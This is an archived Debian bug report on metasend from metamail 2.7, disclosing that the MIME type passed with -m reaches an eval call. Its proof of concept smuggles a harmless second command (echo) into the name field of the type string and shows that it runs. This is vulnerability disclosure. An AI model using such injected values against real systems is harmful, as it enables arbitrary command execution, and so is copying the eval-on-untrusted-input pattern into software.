[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Bug#432932: metasend: Slightly exploitable MIME type setting

Package: metamail
Version: 2.7-53


I hope that the MIME type supplied to metasend will always
come from a trusted source:

jbglaw@lnxp-1008:~$ metasend -b -s "Some subject" -o xxxx		\
			-F "jbglaw@lug-owl.de"				\
			-m 'foo/bar; name="xxx echo you are dead"'	\
			-e quoted-printable -f /dev/null		\
			-t "jbglaw@lug-owl.de"
you are dead

This is due the use of `eval', which is a typo and should be spelled
like `evil' ...


      Jan-Benedict Glaw      jbglaw@lug-owl.de              +49-172-7608481
 Signature of:                    Don't believe in miracles: Rely on them!
 the second  :

Attachment: signature.asc
Description: Digital signature

Reply to: